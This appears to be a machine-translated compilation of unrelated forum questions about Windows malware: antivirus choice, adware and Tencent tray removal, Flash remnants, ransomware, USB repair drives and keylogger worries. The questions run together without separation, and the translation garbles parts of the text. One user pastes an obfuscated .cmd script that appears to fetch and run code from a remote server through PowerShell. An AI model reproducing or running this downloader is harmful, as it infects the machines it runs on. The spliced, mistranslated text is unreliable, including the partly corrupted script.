标签: malware

假设我必须访问一个网站，并且我 99% 肯定它会试图以某种方式在我的计算机上放置病毒。我可以在浏览器、操作系统等中更改哪些设置，以确保我尽可能安全地访问该站点（假设我没有做任何愚蠢的事情，例如从那里安装软件）。我正在使用 Internet Explorer。

我对 Windows 不太了解，但我的女朋友有一台 Windows Vista 笔记本电脑，它似乎经常被她安装的 McAfee 病毒/恶意软件保护所困扰，结果它几乎在几分钟内完全没有响应。

所以我的计划是放弃 McAfee 并安装一些可以安静地坐在后台并且不会在她真正想要使用她的计算机时过多打扰的东西。因此，我非常感谢有关实际有效但不会占用 CPU 和磁盘带宽的免费（或低成本）病毒/恶意软件保护的建议。

这个名为“龙枝广告”的烦人应用程序安装在我的电脑上，我不知道如何或在我的电脑上安装它。我的问题是..有谁知道“龙枝广告”是如何安装在我的电脑上的？

我还通读了问题如何从我的 PC 中删除恶意间谍软件、恶意软件、病毒或 rootkit，但找不到任何提及“龙分支添加”或第三方应用程序“安装” “龙分支添加”的内容

史蒂文的回答有关于如何从 PC 中删除“龙分支添加”的说明。它没有直接回答我的问题，但确实为我指明了 YouTube 下载程序的方向。在进一步研究之后，我认为不确定，但我认为由 HOW Inc 发布的这个“免费 YouTube 下载器”程序是也在我的 PC 上安装了“龙分支添加”的应用程序。

我觉得这个免费YouTube下载器是罪魁祸首，前两天我手动删除了“龙分支添加”，昨晚我卸载了“免费YouTube下载器”，从那以后我就没有看到“龙分支添加”了..我不知道确定这个“免费 YouTube 下载器”也安装了“龙分支添加”，但它确实看起来像它来自的地方

我在 Mac OS X 上的 VirtualBox 中运行的 Windows 10 来宾操作系统似乎感染了病毒。有没有办法重新安装操作系统并清除任何隐藏的恶意软件，但保留我的数据文件（程序自定义、尚未备份到主机的文档等）？

勒索软件加密可以覆盖 TrueCrypt 加密吗？那会发生什么

成员们在我的系统中卸载了一些未知的中文程序我尝试了许多防病毒和恶意软件清除程序，但对这个程序是什么一无所知。最后，我发布了该程序提供的弹出窗口的屏幕截图。请查看以下屏幕截图以了解我在说什么https://drive.google.com/open?id=0B1JJUfLfFwrLZzljbHNpSUJKLWs

由于这个中文程序的中断，我无法在我的笔记本电脑上正常工作。经常出现弹出窗口，我不知道该怎么做。不幸的是，它也没有向我显示已安装程序列表中列出的程序。我已经用恶意软件字节完全扫描了笔记本电脑，但没有成功。

更新 根据下面的建议，我已经能够解决这个问题，但通知栏中只存在一个图标 QQPCtray.exe，问题已解决 95%。我只剩下 QQPCTray.exe 显示在通知栏中。快照在这里https://drive.google.com/file/d/0B1JJUfLfFwrLQXBkYV8yOUcxYUk/view?usp=sharing腾讯程序已卸载。我已经手动删除了 C:\Users\hp\AppData\Roaming\Tencent 文件夹，但我仍然可以在通知栏中看到 QQPCTray。那么如何从通知栏中删除它，如您在上面的屏幕截图中所见。

我已经注意到 Adob​​e Flash 中的一些剩余注册表项，尽管我几个月前删除了它：

HKEY_LOCAL_MACHINE\SOFTWARE\Macromedia
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Macromedia

我试图删除它们，但我没有必要的权限，所以我确保 regedit.exe 以管理员权限运行，但仍然不可能。所以我做了一些研究，发现这个教程取得了注册表项的所有权，但删除仍然不起作用！之后，我使用runassystem.exe以 SYSTEM 身份打开 regedit.exe 但再次出现相同的错误！之后，我尝试将完全所有权作为 SYSTEM 授予我的用户帐户和所有管理员......同样的错误！

好吧，然后我搜索了整个 C: 驱动器并找到了两个文件夹：

C:\WINDOWS\System32\Macromed\Flash
C:\WINDOWS\SysWOW64\Macromed\Flash

它们都包含完全相同的文件：

我试图以管理员身份删除它们...没有用！甚至没有Lockhunter！

Lockhunter 说没有进程阻止这些文件夹，所以我试图删除它们，但又一次......它没有用！所以我点击了“下次系统重启时删除”并重新启动。在登录它提示删除成功但你猜怎么着？文件夹还在！

这到底是什么？在什么世界中，“合法”公司可以接受这种行为？ 如何彻底删除Flash？

我有一个装满电脑维修工具的可启动 USB 驱动器。我会用它来修复很可能被病毒或其他恶意软件感染的计算机。我想知道如何防止恶意软件传播到我的 USB 驱动器。

笔记：

• 已经有关于从 USB 传播到计算机的问题，但我找不到任何关于计算机到 USB 的问题。
• 此解决方案必须基于 Windows，但不是特定于计算机的。

今天我收到了一些非常有趣的东西。它是一个带有加密命令的 .cmd 脚本。谁能告诉我这是什么加密方式？可以解密吗？或者windows如何读取这种类型的命令？
我在我的 Win7 VM 中执行了这段代码，但什么也没发生。我寻找了一些奇怪的东西，比如服务、进程或环境变量……一切看起来都很好

！@回响
CD的％SystemRoot％\ System32下
设置uQmFERgK = GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
设置JD = W ^ I ^Ñ
设置beoxNuYr = ^ d ^ O ^瓦特
组fSUXCI = ^ SPO
设置XFY = ^我们^ R
组NKHoDvv =她
设定DdAvVw = ^ l^l\
设置 BnCCBy=v^1^。
set xuuyxYlz=^0^\p^o
set zEonzEj=^w^e
set nqfsDHhb=r^sh
set tsaNePh=el^l
set qIrKO=^.e^x
set qlLkftpA=^e -^n
set pZckbH=op^
设置 MrCpkeh=-w
设置 kGm=^i^n ^1^ -
设置日期=%uQmFERgK:~49,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1%
(^"%uQmFERgK:~ 12,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1%
(%uQmFERgK:~22,1%%uQmFERgK:~44,1%%uQmFERgK:~5,1%-%uQmFERgK:~25,1%%uQmFERgK:~9,1%%uQmFERgK:~16,1% %uQmFERgK:~41,1%%uQmFERgK:~24,1%%uQmFERgK:~7,1% %uQmFERgK:~22,1%%uQmFERgK:~41,1%%uQmFERgK:~27,1%.% uQmFERgK:~21,1%%uQmFERgK:~41,1%%uQmFERgK:~9,1%%uQmFERgK:~48,1%%uQmFERgK:~52,1%%uQmFERgK:~12,1%%uQmFERgK:~ ~44,1%%uQmFERgK:~57,1%%uQmFERgK:~27,1%).%uQmFERgK:~38,1%%uQmFERgK:~25,1%%uQmFERgK:~21,1%%uQmFERgK: ~22,1%%uQmFERgK:~52,1%%uQmFERgK:~6,1%%uQmFERgK:~8,1%%uQmFERgK:~38,1%%uQmFERgK:~11,1%%uQmFERgK:~7 ,1%%uQmFERgK:~15,1%%uQmFERgK:~49,1%%uQmFERgK:~57,1%%uQmFERgK:~4,1%('%uQmFERgK:~61,1%%uQmFERgK:~27 ,1%%uQmFERgK:~27,1%%uQmFERgK:~3,1%%uQmFERgK:~39,1%://%uQmFERgK:~38,1%%uQmFERgK:~29,1%%uQmFERgK:~ 59,1%.%uQmFERgK:~3,1%%uQmFERgK:~19,1%%uQmFERgK:~57,1%%uQmFERgK:~57,1%%uQmFERgK:~6,1%%uQmFERgK:~38 ,1%.%uQmFERgK:~24,1%%uQmFERgK:~6,1%%uQmFERgK:~59,1%/?%uQmFERgK:~38,1%%uQmFERgK:~5,1%%uQmFERgK:~9,1%%uQmFERgK:~32,1%%uQmFERgK:~55,1%%uQmFERgK:~4,1%%uQmFERgK:~25,1% %uQmFERgK:~8,1%%uQmFERgK:~2,1%%uQmFERgK:~50,1%%uQmFERgK:~35,1%%uQmFERgK:~52,1%/%uQmFERgK:~16,1%% uQmFERgK:~27,1%%uQmFERgK:~9,1%%uQmFERgK:~41,1%%uQmFERgK:~31,1%%uQmFERgK:~3,1%%uQmFERgK:~18,1%%uQmFERgK: ~7,1%%uQmFERgK:~35,1%%uQmFERgK:~48,1%%uQmFERgK:~11,1%%uQmFERgK:~4,1%%uQmFERgK:~3,1%%uQmFERgK:~15 ,1%%uQmFERgK:~41,1%%uQmFERgK:~17,1%%uQmFERgK:~42,1%%uQmFERgK:~61,1%%uQmFERgK:~45,1%+%uQmFERgK:~43, …

我不小心访问了一个粗略的网站，并点击了一个我认为是恶意广告的链接。在那之后，我认为该站点试图在我的计算机上下载某些内容，但我的防病毒软件阻止了两次下载尝试，之后什么也没发生。

然后我用我的防病毒软件（付费，卡巴斯基）、Malwarebytes 和 Hitman Pro 进行了全面扫描。他们都一无所获。我已经删除了它发生的浏览器（MS Edge）。

我适合去这里还是应该格式化我的电脑？我从来没有点击过任何 .exe 文件并且下载被阻止了，但是会不会有什么遗漏？我主要考虑的是键盘记录器。我使用我的电脑进行网上银行业务，这就是我偏执的原因。

可以简单地单击链接而不激活 .exe 文件在我的计算机上安装键盘记录器吗？我应该格式化吗？格式化它会非常乏味，而且我目前无法进行备份，因此我会丢失很多重要的视频文件。

我使用的是 Windows 10，最近将其更新为新功能包。

请帮帮我。